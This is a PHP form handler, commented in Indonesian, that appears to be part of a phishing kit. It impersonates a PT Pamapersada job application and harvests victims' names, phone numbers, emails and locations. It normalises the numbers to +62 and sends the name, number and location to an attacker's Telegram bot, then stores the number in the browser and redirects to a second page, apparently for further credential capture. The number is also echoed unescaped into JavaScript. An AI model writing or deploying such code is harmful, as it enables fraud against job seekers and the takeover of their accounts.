<?php
// Sertakan file telegram.php yang berisi fungsi pengiriman ke Telegram
include('../../telegram.php');

// Ambil data dari form yang dikirim dengan metode POST
$nama = isset($_POST['nama']) ? $_POST['nama'] : '';
$nomor = isset($_POST['nomor']) ? $_POST['nomor'] : '';
$email = isset($_POST['email']) ? $_POST['email'] : '';
$lokasi = isset($_POST['lokasi']) ? $_POST['lokasi'] : '';
$posisi = isset($_POST['posisi']) ? $_POST['posisi'] : '';  // Menambahkan pilihan posisi

// Cek apakah semua data sudah diisi
if (empty($nama) || empty($nomor) || empty($email) || empty($lokasi) || empty($posisi)) {
    // Jika data tidak lengkap, kembalikan ke halaman sebelumnya
    echo "Semua data harus diisi.";
    exit;
}

// Pastikan nomor dimulai dengan +62
if (substr($nomor, 0, 1) === '0') {
    $nomor = '+62' . substr($nomor, 1); // Hapus 0 di depan dan tambahkan +62
} elseif (!str_starts_with($nomor, '+62')) {
    $nomor = '+62' . $nomor;
}

$message = "┌─────═━┈┈━═─────┐\n";
$message .= "║\n";
$message .= "╠➥ PT PAMAPERSADA\n";
$message .= "║\n";
$message .= "╠➥ Nama: " . $nama . "\n";
$message .= "║\n";
$message .= "╠➥ Nama: " . $nomor . "\n";
$message .= "║\n";
$message .= "╠➥ Lokasi: " . $lokasi . "\n";
$message .= "║\n";

// Kirim pesan ke bot Telegram menggunakan fungsi dari telegram.php
if (kirimKeTelegram($message)) {
    // Simpan nomor ke localStorage dari JavaScript dan redirect tanpa alert
    echo "<script>
            localStorage.setItem('nomorTelegram', '$nomor');
            window.location.href = '../login2.php';
          </script>";
    exit;
} else {
    // Jika gagal mengirim pesan, tampilkan pesan error
    echo "Gagal mengirim pesan ke Telegram.";
}
?>
